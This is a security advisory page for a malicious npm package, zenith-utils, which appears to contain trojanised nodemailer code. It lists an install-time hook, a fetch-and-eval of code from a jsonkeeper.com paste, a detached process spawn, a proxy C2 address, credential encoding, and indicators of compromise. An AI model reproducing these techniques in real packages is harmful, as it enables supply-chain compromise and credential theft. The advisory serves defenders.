VDB

GCVE-110-OSM-2026-6604

GCVE-110-OSM-2026-6604
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 24, 2026
Malicious package detected. Behaviors: data exfiltration, code execution, network activity, obfuscated code, install-time execution. ENTRY lib/utils/index.js (install-hook: node lib/utils/index.js) - Install Hook Executes Local JS File in package.json DESTINATION - custom-c2: http://proxy.host:3128/ (primary, plaintext) in lib/smtp-connection/http-proxy-client.js EXFIL - Fetch and Eval/Exec in lib/utils/smtp-connection/worker.js: "axios.get( "https://jsonkeeper.com/b/WDH3V", { timeout: 1000 } ); new Function" - Data Encoding for Exfiltration in lib/fetch/index.js: "Buffer.from(parsed.auth).toString('base64')" - Data Encoding for Exfiltration in lib/mime-funcs/index.js: "EncodeURIComponent(chr" - Data Encoding for Exfiltration in lib/smtp-connection/http-proxy-client.js: "Buffer.from(proxy.auth).toString('base64')" - Data Encoding for Exfiltration in lib/smtp-connection/index.js: "Buffer.from( //this._auth.user+'\u0000'+ '\u0000' + // skip authorization identi..." - Payload Download from Paste Service in lib/utils/smtp-connection/worker.js: "jsonkeeper.com" - DNS Lookup in lib/mailer/index.js: "dns.resolve(" - DNS Lookup in lib/shared/index.js: "dns.lookup(" (+2 more) OBFUSCATION - Dynamic Base64 Decoding in lib/shared/index.js: "Buffer.from(data, 'base64')" - Dynamic Base64 Decoding in lib/smtp-connection/index.js: "Buffer.from(challengeString, 'base64')" - Strings Extracted from Deobfuscated Code in lib/shared/index.js - Strings Extracted from Deobfuscated Code in lib/smtp-connection/index.js ADDITIONAL FINDINGS - Suspicious TLD Domain in lib/nodemailer.js: "https://ethereal.email" - Shell Command Execution in lib/sendmail-transport/index.js: "child_process').spawn" - Detached Child Process Payload in lib/utils/index.js: "spawn(process.execPath, [filePath], { detached: true" PAYLOAD FILES lib/utils/smtp-connection/worker.js (+ lib/smtp-connection/index.js) INDICATORS (IOCs) - urls: https://Ethereal.email, https://nodemailer.com/smtp/oauth2/, https://nodemailer.com/message/calendar-events/, https://nodemailer.com/, http://nodemailer.com/2-0-0-beta/templating/ (+10 more) - domains: nodemailer.com, Nodemailer.com, litmus.com, data.group, address.group (+34 more) - emails: andris@kreata.ee, info@nodemailer.com, test@googlemail.com - payloadFileHash: 36ceaf4dfa5743e532d2a5db11d699b8fb0672bf1063b194d19d407f87c31191

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownzenith-utilsall (affected)

References

advisory
vendor

Browse GCVE Records

74,366 records in the GCVE database · Updated July 23, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›